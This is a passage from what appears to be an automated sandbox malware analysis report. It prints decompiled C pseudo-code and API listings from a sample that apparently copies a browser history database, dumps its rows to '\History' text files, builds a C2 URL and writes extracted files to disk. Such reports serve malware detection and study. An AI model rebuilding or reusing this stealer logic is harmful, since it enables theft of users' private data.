                                                                    • HeapAlloc.KERNEL32(00000000), ref: 0040F604
                                                                    • lstrcatA.KERNEL32(00000000,00000000), ref: 0040F62D
                                                                    • lstrcatA.KERNEL32(00000000,0043C8DC), ref: 0040F639
                                                                    • lstrlen.KERNEL32(00000000), ref: 0040F652
                                                                    • DeleteFileA.KERNEL32(?), ref: 0040F693
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.593774226.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_400000_cvtres.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: lstrcat$FileHeap_memsetwsprintf$AllocCopyCountDeleteProcessTick_malloc_randlstrlen
                                                                    • String ID: \History\%s_%s.txt
                                                                    • API String ID: 3976021866-3864739126
                                                                    • Opcode ID: 7757212110dec492b3089eadb4235f16282ff018e33efc736dc8abd87155c47c
                                                                    • Instruction ID: d352fc9d1db243d10f2f8d57e291d8bd9c9339a07b22dd591e9f4189da6c75f7
                                                                    • Opcode Fuzzy Hash: 7757212110dec492b3089eadb4235f16282ff018e33efc736dc8abd87155c47c
                                                                    • Instruction Fuzzy Hash: 1A416D76900118BBCB21AFA4EC4DEDEBBBCBB0A300F1104B6F505E2161DB759A858F59
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 0040FE87 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 118stringmemoryfileCOMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 25%
                                                                    			E0040FE87(CHAR* __ebx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				signed int _v8;
				char _v276;
				char _v540;
				char _v544;
				char _v548;
				intOrPtr _v552;
				intOrPtr _v556;
				intOrPtr _v560;
				void* __edi;
				void* __esi;
				signed int _t28;
				void* _t37;
				void* _t76;
				CHAR* _t79;
				signed int _t80;
				void* _t87;

				_t67 = __ebx;
				_t28 =  *0x443674; // 0x393162b1
				_v8 = _t28 ^ _t80;
				_v556 = _a4;
				_v552 = _a8;
				_v560 = _a12;
				E00426300( &_v276, 0, 0x104);
				lstrcatA( &_v276,  *0x445fe0);
				_t37 = 0x1a;
				lstrcatA( &_v276, E00415EF6(_t37, _t87));
				CopyFileA(__ebx,  &_v276, 1);
				E00426300( &_v540, 0, 0x104);
				wsprintfA( &_v540, "\\History\\%s_%s.txt", _v552, _v556);
				_t79 =  *0x445c8c; // 0x4c9c150
				_push( &_v548);
				_push( &_v276);
				if( *0x446248() == 0) {
					_push(0);
					_push( &_v544);
					_push(0xffffffff);
					_push(_t79);
					_push(_v548);
					if( *0x4461fc() == 0) {
						_t79 = HeapAlloc(GetProcessHeap(), 0, 0xf423f);
						while(1) {
							_push(_v544);
							if( *0x446218() != 0x64) {
								break;
							}
							lstrcatA(_t79,  *0x446238(_v544, 0));
							lstrcatA(_t79, 0x43c8dc);
						}
						E0041CE7C(_v560,  &_v540,  *0x446320(_t79), 3);
					}
					 *0x44621c(_v544);
					 *0x44624c(_v548);
				}
				return E0041DA9B(DeleteFileA( &_v276), _t67, _v8 ^ _t80, _t76, 0, _t79);
			}



















                                                                    0x0040fe87
                                                                    0x0040fe90
                                                                    0x0040fe97
                                                                    0x0040fe9e
                                                                    0x0040fea8
                                                                    0x0040feb7
                                                                    0x0040fec7
                                                                    0x0040fedc
                                                                    0x0040fee4
                                                                    0x0040fef2
                                                                    0x0040ff02
                                                                    0x0040ff11
                                                                    0x0040ff31
                                                                    0x0040ff37
                                                                    0x0040ff43
                                                                    0x0040ff4a
                                                                    0x0040ff56
                                                                    0x0040ff5c
                                                                    0x0040ff63
                                                                    0x0040ff64
                                                                    0x0040ff66
                                                                    0x0040ff67
                                                                    0x0040ff78
                                                                    0x0040ff8d
                                                                    0x0040ffb4
                                                                    0x0040ffb4
                                                                    0x0040ffc4
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x0040ffa2
                                                                    0x0040ffae
                                                                    0x0040ffae
                                                                    0x0040ffdf
                                                                    0x0040ffe4
                                                                    0x0040ffed
                                                                    0x0040fffa
                                                                    0x00410000
                                                                    0x0041001b

                                                                    APIs
                                                                    • _memset.LIBCMT ref: 0040FEC7
                                                                    • lstrcatA.KERNEL32(?,?,004132CB,0043C8D8), ref: 0040FEDC
                                                                      • Part of subcall function 00415EF6: _malloc.LIBCMT ref: 00415EFC
                                                                      • Part of subcall function 00415EF6: GetTickCount.KERNEL32 ref: 00415F07
                                                                      • Part of subcall function 00415EF6: _rand.LIBCMT ref: 00415F1C
                                                                      • Part of subcall function 00415EF6: wsprintfA.USER32 ref: 00415F2F
                                                                    • lstrcatA.KERNEL32(?,00000000,?,004132CB,0043C8D8), ref: 0040FEF2
                                                                    • CopyFileA.KERNEL32(?,?,00000001), ref: 0040FF02
                                                                    • _memset.LIBCMT ref: 0040FF11
                                                                    • wsprintfA.USER32 ref: 0040FF31
                                                                    • GetProcessHeap.KERNEL32(00000000,000F423F), ref: 0040FF80
                                                                    • HeapAlloc.KERNEL32(00000000), ref: 0040FF87
                                                                    • lstrcatA.KERNEL32(00000000,00000000), ref: 0040FFA2
                                                                    • lstrcatA.KERNEL32(00000000,0043C8DC), ref: 0040FFAE
                                                                    • lstrlen.KERNEL32(00000000), ref: 0040FFC7
                                                                    • DeleteFileA.KERNEL32(?), ref: 00410008
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.593774226.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_400000_cvtres.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: lstrcat$FileHeap_memsetwsprintf$AllocCopyCountDeleteProcessTick_malloc_randlstrlen
                                                                    • String ID: \History\%s_%s.txt
                                                                    • API String ID: 3976021866-3864739126
                                                                    • Opcode ID: a431df1ee6fe96b82f1b268a9de907cf900087e2419cdd68be891ee51ada8166
                                                                    • Instruction ID: aa68e05fefaab03702a46bb310ec89032731398b9155d2223b23027662571230
                                                                    • Opcode Fuzzy Hash: a431df1ee6fe96b82f1b268a9de907cf900087e2419cdd68be891ee51ada8166
                                                                    • Instruction Fuzzy Hash: 63413D76900118BBCB11ABA4EC49EDEBBBCEB0A315F1100B6F905E2161DA759A848F59
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 0040ACB9 Relevance: 21.2, APIs: 10, Strings: 2, Instructions: 228stringnetworkCOMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 67%
                                                                    			E0040ACB9(intOrPtr* _a4) {
				long _v8;
				char _v16;
				signed int _v24;
				char _v1024;
				char _v2024;
				char _v3024;
				char _v8024;
				char _v8052;
				char _v8080;
				char _v8108;
				intOrPtr* _v8112;
				intOrPtr _v8116;
				intOrPtr _v8120;
				signed short _v8156;
				signed int _v8160;
				CHAR* _v8164;
				signed int _v8172;
				CHAR* _v8176;
				void* _v8180;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t65;
				signed int _t66;
				intOrPtr* _t68;
				char* _t70;
				char* _t71;
				char* _t72;
				char* _t73;
				char* _t74;
				char* _t77;
				intOrPtr* _t90;
				CHAR* _t94;
				char* _t100;
				char* _t101;
				char* _t102;
				char* _t103;
				void* _t105;
				void* _t107;
				void* _t118;
				void* _t120;
				void* _t121;
				void* _t122;
				intOrPtr* _t127;
				void* _t133;
				void* _t134;
				char* _t139;
				void* _t140;
				void* _t141;
				void* _t142;
				void* _t143;
				void* _t144;
				intOrPtr* _t145;
				void* _t146;
				void* _t148;
				CHAR* _t150;
				void* _t155;
				signed int _t156;
				void* _t157;
				void* _t158;
				char* _t159;

				_push(0xffffffff);
				_push(E00434237);
				_push( *[fs:0x0]);
				E0042E300(0x1fe8);
				_t65 =  *0x443674; // 0x393162b1
				_t66 = _t65 ^ _t156;
				_v24 = _t66;
				_push(_t144);
				_push(_t66);
				 *[fs:0x0] =  &_v16;
				_t68 = _a4;
				_t148 = 0x3c;
				_v8120 =  *_t68;
				_v8116 =  *((intOrPtr*)(_t68 + 4));
				_t120 = _t148;
				_t70 =  &_v8180;
				do {
					 *_t70 = 0;
					_t70 = _t70 + 1;
					_t120 = _t120 - 1;
				} while (_t120 != 0);
				_t121 = 0x1388;
				_t71 =  &_v8024;
				do {
					 *_t71 = 0;
					_t71 = _t71 + 1;
					_t121 = _t121 - 1;
				} while (_t121 != 0);
				_t122 = 0x3e8;
				_t140 = 0x3e8;
				_t72 =  &_v2024;
				do {
					 *_t72 = 0;
					_t72 = _t72 + 1;
					_t140 = _t140 - 1;
				} while (_t140 != 0);
				_t141 = 0x3e8;
				_t73 =  &_v3024;
				do {
					 *_t73 = 0;
					_t73 = _t73 + 1;
					_t141 = _t141 - 1;
				} while (_t141 != 0);
				_t74 =  &_v1024;
				do {
					 *_t74 = 0;
					_t74 = _t74 + 1;
					_t122 = _t122 - 1;
					_t166 = _t122;
				} while (_t122 != 0);
				_v8172 = _v8172 | 0xffffffff;
				_v8160 = _v8160 | 0xffffffff;
				_v8180 = _t148;
				_v8164 = E0041D05B(0, _t141, _t144, 0x400, _t166, 0x400);
				_v8176 = E0041D05B(0, _t141, _t144, 0x400, _t166, 0x400);
				_t77 =  *0x4442dc; // 0x4be1588
				_t150 = 0x4442dc;
				if( *0x4442f0 < 0x10) {
					_t77 = 0x4442dc;
				}
				if(InternetCrackUrlA(_t77,  *0x4442ec, 0,  &_v8180) != 0) {
					wsprintfA( &_v2024, "%d", _v8156 & 0x0000ffff);
					_t157 = _t157 + 0xc;
					lstrcatA( &_v3024, _v8164);
					lstrcatA( &_v1024, _v8176);
					_push("://");
				} else {
					lstrcatA( &_v2024, "80");
					_t169 =  *0x4442f0 - 0x10;
					if( *0x4442f0 >= 0x10) {
						_t150 =  *0x4442dc; // 0x4be1588
					}
					lstrcatA( &_v3024, _t150);
					_push("http://");
				}
				lstrcatA( &_v1024, ??);
				_t145 = E00414C66(0,  &_v8052, _t144, _t150, _t169);
				_v8 = 0;
				_v8112 = E00408441( &_v8108);
				_v8 = 1;
				_t90 = E00408392( &_v8080);
				_v8 = 2;
				if( *((intOrPtr*)(_t145 + 0x14)) >= 0x10) {
					_t145 =  *_t145;
				}
				_t127 = _v8112;
				if( *((intOrPtr*)(_t127 + 0x14)) >= 0x10) {
					_t127 =  *_t127;
				}
				if( *((intOrPtr*)(_t90 + 0x14)) >= 0x10) {
					_t90 =  *_t90;
				}
				_push(_t145);
				_push(_t127);
				_push(_t90);
				_push(_v8116);
				_push(_v8120);
				_push( &_v2024);
				_push(E0041EA23());
				_push( &_v3024);
				_t94 = E0040D87A( &_v1024, _t141);
				_t158 = _t157 + 0x1c;
				lstrcatA( &_v8024, _t94);
				E00404354( &_v8080, 1, 0);
				E00404354( &_v8108, 1, 0);
				_v8 = _v8 | 0xffffffff;
				E00404354( &_v8052, 1, 0);
				_t133 = 0x3c;
				_t100 =  &_v8180;
				do {
					 *_t100 = 0;
					_t100 = _t100 + 1;
					_t133 = _t133 - 1;
				} while (_t133 != 0);
				_t134 = 0x3e8;
				_t142 = 0x3e8;
				_t101 =  &_v2024;
				do {
					 *_t101 = 0;
					_t101 = _t101 + 1;
					_t142 = _t142 - 1;
				} while (_t142 != 0);
				_t143 = 0x3e8;
				_t102 =  &_v3024;
				do {
					 *_t102 = 0;
					_t102 = _t102 + 1;
					_t143 = _t143 - 1;
				} while (_t143 != 0);
				_t103 =  &_v1024;
				do {
					 *_t103 = 0;
					_t103 = _t103 + 1;
					_t134 = _t134 - 1;
				} while (_t134 != 0);
				_t105 =  *0x446320( &_v8024);
				_t178 = _t105 - 2;
				if(_t105 <= 2) {
					_t107 =  *0x446320( &_v8024);
					 *0x4465f4 = 1;
					__eflags = _t107 - 2;
					if(_t107 != 2) {
						 *0x4465f4 = 0;
					}
				} else {
					_t159 = _t158 - 0x1c;
					_t139 = _t159;
					_v8112 = _t159;
					 *((intOrPtr*)(_t139 + 0x14)) = 0xf;
					 *((intOrPtr*)(_t139 + 0x10)) = 0;
					 *_t139 = 0;
					E00404331(_t139,  &_v8024);
					E00408464(0, _t143, _t145, 1, _t178);
					 *0x4465f4 = 1;
				}
				 *[fs:0x0] = _v16;
				_pop(_t146);
				_pop(_t155);
				_pop(_t118);
				return E0041DA9B(0, _t118, _v24 ^ _t156, _t143, _t146, _t155);
			}

































































                                                                    0x0040acbc
                                                                    0x0040acbe
                                                                    0x0040acc9
                                                                    0x0040accf
                                                                    0x0040acd4
                                                                    0x0040acd9
                                                                    0x0040acdb
                                                                    0x0040ace0
                                                                    0x0040ace1
                                                                    0x0040ace5
                                                                    0x0040aceb
                                                                    0x0040acf5
                                                                    0x0040acf6
                                                                    0x0040acfc
                                                                    0x0040ad02
                                                                    0x0040ad04
                                                                    0x0040ad0c
                                                                    0x0040ad0c
                                                                    0x0040ad0e
                                                                    0x0040ad0f
                                                                    0x0040ad0f
                                                                    0x0040ad12
                                                                    0x0040ad17
                                                                    0x0040ad1d
                                                                    0x0040ad1d
                                                                    0x0040ad1f
                                                                    0x0040ad20
                                                                    0x0040ad20
                                                                    0x0040ad23
                                                                    0x0040ad28
                                                                    0x0040ad2a
                                                                    0x0040ad30
                                                                    0x0040ad30
                                                                    0x0040ad32
                                                                    0x0040ad33
                                                                    0x0040ad33
                                                                    0x0040ad36
                                                                    0x0040ad38
                                                                    0x0040ad3e
                                                                    0x0040ad3e
                                                                    0x0040ad40
                                                                    0x0040ad41
                                                                    0x0040ad41
                                                                    0x0040ad44
                                                                    0x0040ad4a
                                                                    0x0040ad4a
                                                                    0x0040ad4c
                                                                    0x0040ad4d
                                                                    0x0040ad4d
                                                                    0x0040ad4d
                                                                    0x0040ad50
                                                                    0x0040ad57
                                                                    0x0040ad5e
                                                                    0x0040ad71
                                                                    0x0040ad83
                                                                    0x0040ad89
                                                                    0x0040ad8f
                                                                    0x0040ad94
                                                                    0x0040ad96
                                                                    0x0040ad96
                                                                    0x0040adaf
                                                                    0x0040adfb
                                                                    0x0040ae01
                                                                    0x0040ae11
                                                                    0x0040ae24
                                                                    0x0040ae2a
                                                                    0x0040adb1
                                                                    0x0040adbd
                                                                    0x0040adc3
                                                                    0x0040adca
                                                                    0x0040adcc
                                                                    0x0040adcc
                                                                    0x0040adda
                                                                    0x0040ade0
                                                                    0x0040ade0
                                                                    0x0040ae36
                                                                    0x0040ae47
                                                                    0x0040ae4f
                                                                    0x0040ae57
                                                                    0x0040ae63
                                                                    0x0040ae67
                                                                    0x0040ae6c
                                                                    0x0040ae74
                                                                    0x0040ae76
                                                                    0x0040ae76
                                                                    0x0040ae78
                                                                    0x0040ae82
                                                                    0x0040ae84
                                                                    0x0040ae84
                                                                    0x0040ae8a
                                                                    0x0040ae8c
                                                                    0x0040ae8c
                                                                    0x0040ae8e
                                                                    0x0040ae8f
                                                                    0x0040ae90
                                                                    0x0040ae91
                                                                    0x0040ae9d
                                                                    0x0040aea3
                                                                    0x0040aeaa
                                                                    0x0040aeb1
                                                                    0x0040aeb8
                                                                    0x0040aebd
                                                                    0x0040aec8
                                                                    0x0040aed9
                                                                    0x0040aee6
                                                                    0x0040aeeb
                                                                    0x0040aef7
                                                                    0x0040aefe
                                                                    0x0040aeff
                                                                    0x0040af05
                                                                    0x0040af05
                                                                    0x0040af07
                                                                    0x0040af08
                                                                    0x0040af08
                                                                    0x0040af0b
                                                                    0x0040af10
                                                                    0x0040af12
                                                                    0x0040af18
                                                                    0x0040af18
                                                                    0x0040af1a
                                                                    0x0040af1b
                                                                    0x0040af1b
                                                                    0x0040af1e
                                                                    0x0040af20
                                                                    0x0040af26
                                                                    0x0040af26
                                                                    0x0040af28
                                                                    0x0040af29
                                                                    0x0040af29
                                                                    0x0040af2c
                                                                    0x0040af32
                                                                    0x0040af32
                                                                    0x0040af34
                                                                    0x0040af35
                                                                    0x0040af35
                                                                    0x0040af3f
                                                                    0x0040af45
                                                                    0x0040af4e
                                                                    0x0040af7e
                                                                    0x0040af84
                                                                    0x0040af8a
                                                                    0x0040af8d
                                                                    0x0040af8f
                                                                    0x0040af8f
                                                                    0x0040af50
                                                                    0x0040af50
                                                                    0x0040af53
                                                                    0x0040af55
                                                                    0x0040af5b
                                                                    0x0040af62
                                                                    0x0040af66
                                                                    0x0040af68
                                                                    0x0040af6d
                                                                    0x0040af75
                                                                    0x0040af75
                                                                    0x0040af9a
                                                                    0x0040afa2
                                                                    0x0040afa3
                                                                    0x0040afa4
                                                                    0x0040afb0

                                                                    APIs
                                                                    • InternetCrackUrlA.WININET(04BE1588,00000000,?), ref: 0040ADA7
                                                                    • lstrcatA.KERNEL32(?,0043EC20), ref: 0040ADBD
                                                                    • lstrcatA.KERNEL32(?,004442DC), ref: 0040ADDA
                                                                    • wsprintfA.USER32 ref: 0040ADFB
                                                                    • lstrcatA.KERNEL32(?,?), ref: 0040AE11
                                                                    • lstrcatA.KERNEL32(?,?), ref: 0040AE24
                                                                    • lstrcatA.KERNEL32(?,://), ref: 0040AE36
                                                                    • lstrcatA.KERNEL32(?,00000000), ref: 0040AEC8
                                                                      • Part of subcall function 00404354: _memmove.LIBCMT ref: 00404373
                                                                    • lstrlen.KERNEL32(?,00000001,00000000,00000001,00000000,00000001,00000000), ref: 0040AF3F
                                                                    • lstrlen.KERNEL32(?), ref: 0040AF7E
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.593774226.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_400000_cvtres.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: lstrcat$lstrlen$CrackInternet_memmovewsprintf
                                                                    • String ID: ://$http://
                                                                    • API String ID: 3481673703-3772126531
                                                                    • Opcode ID: 30765006a9ce84e9c53db51ecdb021492593b6aaf4c80a5fbbc572c231c0e284
                                                                    • Instruction ID: 96e7ee55b5b0f33d58b683fa1b1e3b32b82c02d2bd62b2cadccec16d22c8602c
                                                                    • Opcode Fuzzy Hash: 30765006a9ce84e9c53db51ecdb021492593b6aaf4c80a5fbbc572c231c0e284
                                                                    • Instruction Fuzzy Hash: 1991AF7190025A9FDB15DF54DD44AEEBB78EF1A304F1001FAE40AA7291DB385E84CF69
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00407E8D Relevance: 19.5, APIs: 7, Strings: 4, Instructions: 253filetimeCOMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 97%
                                                                    			E00407E8D(void* __ecx, void* __edx, long _a4, signed int _a8, intOrPtr _a12, intOrPtr _a16) {
				signed int _v8;
				char _v275;
				char _v276;
				char _v540;
				struct _FILETIME _v560;
				struct _FILETIME _v568;
				struct _FILETIME _v576;
				unsigned int _v580;
				char _v844;
				char _v845;
				signed int _v852;
				void* _v856;
				long _v860;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t86;
				intOrPtr _t89;
				signed int _t97;
				void* _t100;
				void* _t101;
				void* _t105;
				void* _t108;
				signed char _t112;
				long _t113;
				void* _t123;
				int _t135;
				long _t143;
				long _t154;
				long _t157;
				void* _t163;
				signed int _t169;

				_t163 = __edx;
				_t86 =  *0x443674; // 0x393162b1
				_v8 = _t86 ^ _t169;
				_t143 = __ecx;
				_v856 = __ecx;
				_v852 = _a8;
				if(_a16 == 3) {
					_t89 =  *((intOrPtr*)(__ecx + 4));
					_t166 = _a4;
					__eflags = _t166 - _t89;
					if(_t166 == _t89) {
						L13:
						_t166 = E004074FF( *_t143, _a12, _v852,  &_v845);
						__eflags = _t166;
						if(_t166 <= 0) {
							_t164 =  *_t143;
							E0040772D( *_t143);
							_t25 = _t143 + 4;
							 *_t25 =  *(_t143 + 4) | 0xffffffff;
							__eflags =  *_t25;
						}
						__eflags = _v845;
						if(_v845 == 0) {
							__eflags = _t166;
							if(_t166 <= 0) {
								__eflags = _t166 - 0xffffff96;
								_t97 = ((0 | _t166 != 0xffffff96) - 0x00000001 & 0xfb001000) + 0x5000000;
							} else {
								_t97 = 0x600;
							}
							goto L62;
						} else {
							L16:
							_t97 = 0;
							L62:
							return E0041DA9B(_t97, _t143, _v8 ^ _t169, _t163, _t164, _t166);
						}
					}
					__eflags = _t89 - 0xffffffff;
					if(_t89 != 0xffffffff) {
						_t164 =  *__ecx;
						E0040772D( *__ecx);
					}
					_t100 =  *_t143;
					 *(_t143 + 4) =  *(_t143 + 4) | 0xffffffff;
					__eflags = _t166 -  *((intOrPtr*)(_t100 + 4));
					if(_t166 >=  *((intOrPtr*)(_t100 + 4))) {
						L3:
						_t97 = 0x10000;
						goto L62;
					}
					__eflags = _t166 -  *((intOrPtr*)(_t100 + 0x10));
					if(_t166 <  *((intOrPtr*)(_t100 + 0x10))) {
						E00407035(_t100);
						_t166 = _a4;
					}
					_t101 =  *_t143;
					__eflags =  *((intOrPtr*)(_t101 + 0x10)) - _t166;
					if( *((intOrPtr*)(_t101 + 0x10)) >= _t166) {
						L12:
						E004073AA( *_t143,  *((intOrPtr*)(_t143 + 0x138)));
						_t154 = _v856;
						 *((intOrPtr*)(_t154 + 4)) = _a4;
						_t143 = _t154;
						goto L13;
					} else {
						do {
							E0040706A( *_t143);
							_t105 =  *_t143;
							__eflags =  *((intOrPtr*)(_t105 + 0x10)) - _a4;
						} while ( *((intOrPtr*)(_t105 + 0x10)) < _a4);
						goto L12;
					}
				}
				if(_a16 == 2 || _a16 == 1) {
					__eflags =  *(_t143 + 4) - 0xffffffff;
					if( *(_t143 + 4) != 0xffffffff) {
						E0040772D( *_t143);
					}
					_t166 =  *_t143;
					_t164 = _a4;
					 *(_t143 + 4) =  *(_t143 + 4) | 0xffffffff;
					__eflags = _t164 -  *((intOrPtr*)(_t166 + 4));
					if(_t164 >=  *((intOrPtr*)(_t166 + 4))) {
						goto L3;
					} else {
						__eflags = _t164 -  *((intOrPtr*)(_t166 + 0x10));
						if(_t164 <  *((intOrPtr*)(_t166 + 0x10))) {
							E00407035(_t166);
						}
						while(1) {
							_t108 =  *_t143;
							__eflags =  *((intOrPtr*)(_t108 + 0x10)) - _t164;
							if( *((intOrPtr*)(_t108 + 0x10)) >= _t164) {
								break;
							}
							_t166 =  *_t143;
							E0040706A( *_t143);
						}
						_t164 = _v856;
						_t143 =  &_v844;
						E0040781A(_t143, _t164, _t163, _t164);
						_t112 = _v580 >> 4;
						__eflags = _t112 & 0x00000001;
						if((_t112 & 0x00000001) != 0) {
							goto L16;
						}
						__eflags = _a16 - 1;
						_v540 = 0;
						if(_a16 != 1) {
							_t166 = _v852;
							_t113 =  *_t166;
							_t157 = _t166;
							while(1) {
								__eflags = _t113;
								if(_t113 == 0) {
									break;
								}
								__eflags = _t113 - 0x2f;
								if(_t113 == 0x2f) {
									L33:
									_t143 = _t157 + 1;
									L34:
									_t157 = _t157 + 1;
									__eflags = _t157;
									_t113 =  *_t157;
									continue;
								}
								__eflags = _t113 - 0x5c;
								if(_t113 != 0x5c) {
									goto L34;
								}
								goto L33;
							}
							E0041E427( &_v276, _t166, 0x104);
							__eflags = _t143 - _t166;
							if(_t143 != _t166) {
								 *((char*)(_t169 + _t143 - _t166 - 0x110)) = 0;
								__eflags = _v276 - 0x2f;
								if(_v276 == 0x2f) {
									L46:
									wsprintfA( &_v540, "%s%s",  &_v276, _t143);
									L39:
									__eflags = 0;
									_t123 = CreateFileA( &_v540, 0x40000000, 0, 0, 2, _v580, 0);
									L40:
									_v856 = _t123;
									__eflags = _t123 - 0xffffffff;
									if(_t123 != 0xffffffff) {
										_t146 =  *_t164;
										E004073AA( *_t164,  *((intOrPtr*)(_t164 + 0x138)));
										__eflags =  *(_t164 + 0x13c);
										_t166 = 0x4000;
										if(__eflags == 0) {
											 *(_t164 + 0x13c) = E0041D05B(_t146, _t163, _t164, 0x4000, __eflags, 0x4000);
										}
										_t66 =  &_v852;
										 *_t66 = _v852 & 0x00000000;
										__eflags =  *_t66;
										while(1) {
											_t143 = E004074FF( *_t164, _t166,  *(_t164 + 0x13c),  &_v845);
											__eflags = _t143 - 0xffffff96;
											if(_t143 == 0xffffff96) {
												break;
											}
											__eflags = _t143;
											if(__eflags < 0) {
												L56:
												_v852 = 0x5000000;
												L57:
												E0040772D(_t164);
												__eflags = _v852;
												if(_v852 == 0) {
													SetFileTime(_v856,  &_v568,  &_v576,  &_v560);
												}
												__eflags = _a16 - 1;
												if(_a16 != 1) {
													CloseHandle(_v856);
												}
												_t97 = _v852;
												goto L62;
											}
											if(__eflags <= 0) {
												L54:
												__eflags = _v845;
												if(_v845 != 0) {
													goto L57;
												}
												__eflags = _t143;
												if(_t143 != 0) {
													continue;
												}
												goto L56;
											}
											_t135 = WriteFile(_v856,  *(_t164 + 0x13c), _t143,  &_v860, 0);
											__eflags = _t135;
											if(_t135 == 0) {
												_v852 = 0x400;
												goto L57;
											}
											goto L54;
										}
										_v852 = 0x1000;
										goto L57;
									}
									_t97 = 0x200;
									goto L62;
								}
								__eflags = _v276 - 0x5c;
								if(_v276 == 0x5c) {
									goto L46;
								}
								__eflags = _v276;
								if(_v276 == 0) {
									L38:
									wsprintfA( &_v540, "%s%s%s", _t164 + 0x140,  &_v276, _t143);
									goto L39;
								}
								__eflags = _v275 - 0x3a;
								if(_v275 != 0x3a) {
									goto L38;
								}
								goto L46;
							}
							_v276 = 0;
							goto L38;
						}
						_t123 = _v852;
						goto L40;
					}
				} else {
					goto L3;
				}
			}



































                                                                    0x00407e8d
                                                                    0x00407e96
                                                                    0x00407e9d
                                                                    0x00407ea9
                                                                    0x00407eac
                                                                    0x00407eb2
                                                                    0x00407eb8
                                                                    0x00407ed8
                                                                    0x00407edb
                                                                    0x00407ede
                                                                    0x00407ee0
                                                                    0x00407f3c
                                                                    0x00407f53
                                                                    0x00407f57
                                                                    0x00407f59
                                                                    0x00407f5b
                                                                    0x00407f5d
                                                                    0x00407f62
                                                                    0x00407f62
                                                                    0x00407f62
                                                                    0x00407f62
                                                                    0x00407f66
                                                                    0x00407f6d
                                                                    0x00407f76
                                                                    0x00407f78
                                                                    0x00407f86
                                                                    0x00407f92
                                                                    0x00407f7a
                                                                    0x00407f7a
                                                                    0x00407f7a
                                                                    0x00000000
                                                                    0x00407f6f
                                                                    0x00407f6f
                                                                    0x00407f6f
                                                                    0x004081d9
                                                                    0x004081e7
                                                                    0x004081e7
                                                                    0x00407f6d
                                                                    0x00407ee2
                                                                    0x00407ee5
                                                                    0x00407ee7
                                                                    0x00407ee9
                                                                    0x00407ee9
                                                                    0x00407eee
                                                                    0x00407ef0
                                                                    0x00407ef4
                                                                    0x00407ef7
                                                                    0x00407ece
                                                                    0x00407ece
                                                                    0x00000000
                                                                    0x00407ece
                                                                    0x00407ef9
                                                                    0x00407efc
                                                                    0x00407f00
                                                                    0x00407f05
                                                                    0x00407f05
                                                                    0x00407f08
                                                                    0x00407f0a
                                                                    0x00407f0d
                                                                    0x00407f20
                                                                    0x00407f28
                                                                    0x00407f31
                                                                    0x00407f37
                                                                    0x00407f3a
                                                                    0x00000000
                                                                    0x00407f0f
                                                                    0x00407f0f
                                                                    0x00407f11
                                                                    0x00407f16
                                                                    0x00407f1b
                                                                    0x00407f1b
                                                                    0x00000000
                                                                    0x00407f0f
                                                                    0x00407f0d
                                                                    0x00407ebe
                                                                    0x00407f9c
                                                                    0x00407fa0
                                                                    0x00407fa4
                                                                    0x00407fa4
                                                                    0x00407fa9
                                                                    0x00407fab
                                                                    0x00407fae
                                                                    0x00407fb2
                                                                    0x00407fb5
                                                                    0x00000000
                                                                    0x00407fbb
                                                                    0x00407fbb
                                                                    0x00407fbe
                                                                    0x00407fc0
                                                                    0x00407fc0
                                                                    0x00407fce
                                                                    0x00407fce
                                                                    0x00407fd0
                                                                    0x00407fd3
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00407fc7
                                                                    0x00407fc9
                                                                    0x00407fc9
                                                                    0x00407fd6
                                                                    0x00407fdc
                                                                    0x00407fe4
                                                                    0x00407fef
                                                                    0x00407ff2
                                                                    0x00407ff4
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00407ffa
                                                                    0x00407ffe
                                                                    0x00408005
                                                                    0x00408012
                                                                    0x00408018
                                                                    0x0040801c
                                                                    0x0040802e
                                                                    0x0040802e
                                                                    0x00408030
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00408020
                                                                    0x00408022
                                                                    0x00408028
                                                                    0x00408028
                                                                    0x0040802b
                                                                    0x0040802b
                                                                    0x0040802b
                                                                    0x0040802c
                                                                    0x00000000
                                                                    0x0040802c
                                                                    0x00408024
                                                                    0x00408026
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00408026
                                                                    0x0040803f
                                                                    0x00408047
                                                                    0x00408049
                                                                    0x004080ae
                                                                    0x004080b6
                                                                    0x004080bd
                                                                    0x004080de
                                                                    0x004080f2
                                                                    0x00408076
                                                                    0x00408076
                                                                    0x0040808f
                                                                    0x00408095
                                                                    0x00408095
                                                                    0x0040809b
                                                                    0x0040809e
                                                                    0x00408106
                                                                    0x00408108
                                                                    0x0040810d
                                                                    0x00408115
                                                                    0x0040811a
                                                                    0x00408123
                                                                    0x00408123
                                                                    0x00408129
                                                                    0x00408129
                                                                    0x00408129
                                                                    0x00408130
                                                                    0x00408146
                                                                    0x0040814a
                                                                    0x0040814d
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00408153
                                                                    0x00408155
                                                                    0x00408186
                                                                    0x00408186
                                                                    0x00408190
                                                                    0x00408192
